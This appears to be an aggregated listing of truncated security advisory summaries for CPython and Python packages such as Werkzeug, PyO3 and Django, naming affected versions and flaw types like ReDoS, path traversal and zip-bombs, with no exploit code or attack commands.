Low: python3

Issue Overview: The "ipaddress" module contained incorrect information about whether certain IPv4 and IPv6 addresses were designated as "globally reachable" or "private". This affected the isprivate and isglobal properties of the ipaddress.IPv4Address, ipaddress.IPv4Network, ipaddress.IPv6Address...

USN-7280-1 python3.10, python3.12, python3.8 vulnerability

It was discovered that Python incorrectly handled parsing domain names that included square brackets. A remote attacker could possibly use this issue to perform a Server-Side Request Forgery SSRF attack...

DEBIAN-CVE-2025-22153

RestrictedPython is a tool that helps to define a subset of the Python language which allows to provide a program input into a trusted environment. Via a type confusion bug in versions of the CPython interpreter starting in 3.11 and prior to 3.13.2 when using try/except, RestrictedPython starting...

BIT-PYTHON-MIN-2020-8492

Python 2.7 through 2.7.17, 3.5 through 3.5.9, 3.6 through 3.6.10, 3.7 through 3.7.6, and 3.8 through 3.8.1 allows an HTTP server to conduct Regular Expression Denial of Service ReDoS attacks against a client because of urllib.request.AbstractBasicAuthHandler catastrophic backtracking...

BIT-PYTHON-MIN-2023-40217

An issue was discovered in Python before 3.8.18, 3.9.x before 3.9.18, 3.10.x before 3.10.13, and 3.11.x before 3.11.5. It primarily affects servers such as HTTP servers that use TLS client authentication. If a TLS server-side socket is created, receives data into the socket buffer, and then is...

PT-2024-10121

Name of the Vulnerable Software and Affected Versions Python versions 3.12.0 through 3.12.x Python versions prior to 3.14.0a2 Description The issue is related to the asyncio. SelectorSocketTransport.writelines method, which does not properly "pause" writing and signal to the Protocol to drain the...

Build corruption when using `PYO3_CONFIG_FILE` environment variable

In PyO3 0.23.0 the PYO3CONFIGFILE environment variable used to configure builds regressed such that changing the environment variable would no longer trigger PyO3 to reconfigure and recompile. In combination with workflows using tools such as maturin to build for multiple versions in a single...

PT-2024-33676

Name of the Vulnerable Software and Affected Versions: Werkzeug versions prior to 3.0.6 Description: The issue arises from the os.path.isabs function not correctly handling UNC paths like //server/share on Python versions less than 3.11 on Windows. This affects Werkzeug's safe join function, whic...

Werkzeug 路径遍历漏洞

Werkzeug is a comprehensive WSGI web application library open-sourced by Pallets. A path traversal vulnerability exists in Werkzeug versions prior to 3.0.6, which stems from the inability of os.path.isabs to catch UNC paths on Windows systems with Python versions less than 3.11, resulting in...

AZL-50926 CVE-2024-9287 affecting package python3 for versions less than 3.12.9-1

A vulnerability has been found in the CPython venv module and CLI where path names provided when creating a virtual environment were not quoted properly, allowing the creator to inject commands into virtual environment "activation" scripts ie "source venv/bin/activate". This means that...

AZL-48585 CVE-2024-6232 affecting package python3 for versions less than 3.9.19-5

There is a MEDIUM severity vulnerability affecting CPython. Regular expressions that allowed excessive backtracking during tarfile.TarFile header parsing are vulnerable to ReDoS via specifically-crafted tar archives...

Python Multiple Vulnerabilities (Aug 2024) - Windows

Python is prone to an infinite loop vulnerability leading to a denial of service DoS. SPDX-FileCopyrightText: 2024 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only CPE =...

11x-wagtail-blog (>=0.0.0 <=0.2.0), aldryn-django (>=5.0.2.0 <=5.0.11.0) +240 more potentially affected by CVE-2024-41990 via django (>=5.0.0 <=5.0.7)

django PYPI version =5.0.0, =0.0.0, =5.0.2.0, =0.0.15, =1.14.3, =0.0.20, =0.0.13, =0.0.19, =0.0.34, =0.0.50, =0.0.5, =0.0.11, =1.0.3, =0.1.0, =0.2.5 and more Source cves: CVE-2024-41990 Source advisory: OSV:PYSEC-2024-68...

AZL-47346 CVE-2024-6923 affecting package python3 for versions less than 3.9.19-8

There is a MEDIUM severity vulnerability affecting CPython. The email module didn’t properly quote newlines for email headers when serializing an email message allowing for header injection when an email is serialized...

DEBIAN-CVE-2024-5642

CPython 3.9 and earlier doesn't disallow configuring an empty list "" for SSLContext.setnpnprotocols which is an invalid value for the underlying OpenSSL API. This results in a buffer over-read when NPN is used see CVE-2024-5535 for OpenSSL. This vulnerability is of low severity due to NPN being...

UBUNTU-CVE-2024-5642

CPython 3.9 and earlier doesn't disallow configuring an empty list "" for SSLContext.setnpnprotocols which is an invalid value for the underlying OpenSSL API. This results in a buffer over-read when NPN is used see CVE-2024-5535 for OpenSSL. This vulnerability is of low severity due to NPN being...

UBUNTU-CVE-2024-4032

The “ipaddress” module contained incorrect information about whether certain IPv4 and IPv6 addresses were designated as “globally reachable” or “private”. This affected the isprivate and isglobal properties of the ipaddress.IPv4Address, ipaddress.IPv4Network, ipaddress.IPv6Address, and...

Medium: python3

Issue Overview: An issue was found in the CPython zipfile module affecting versions 3.12.2, 3.11.8, 3.10.13, 3.9.18, and 3.8.18 and prior. The zipfile module is vulnerable to "quoted-overlap" zip-bombs which exploit the zip format to create a zip-bomb with a high compression ratio. The fixed...

AZL-36894 CVE-2024-0450 affecting package python3 for versions less than 3.9.19-1

An issue was found in the CPython zipfile module affecting versions 3.12.1, 3.11.7, 3.10.13, 3.9.18, and 3.8.18 and prior. The zipfile module is vulnerable to “quoted-overlap” zip-bombs which exploit the zip format to create a zip-bomb with a high compression ratio. The fixed versions of CPython...

ALPINE-CVE-2024-0450

An issue was found in the CPython zipfile module affecting versions 3.12.1, 3.11.7, 3.10.13, 3.9.18, and 3.8.18 and prior. The zipfile module is vulnerable to “quoted-overlap” zip-bombs which exploit the zip format to create a zip-bomb with a high compression ratio. The fixed versions of CPython...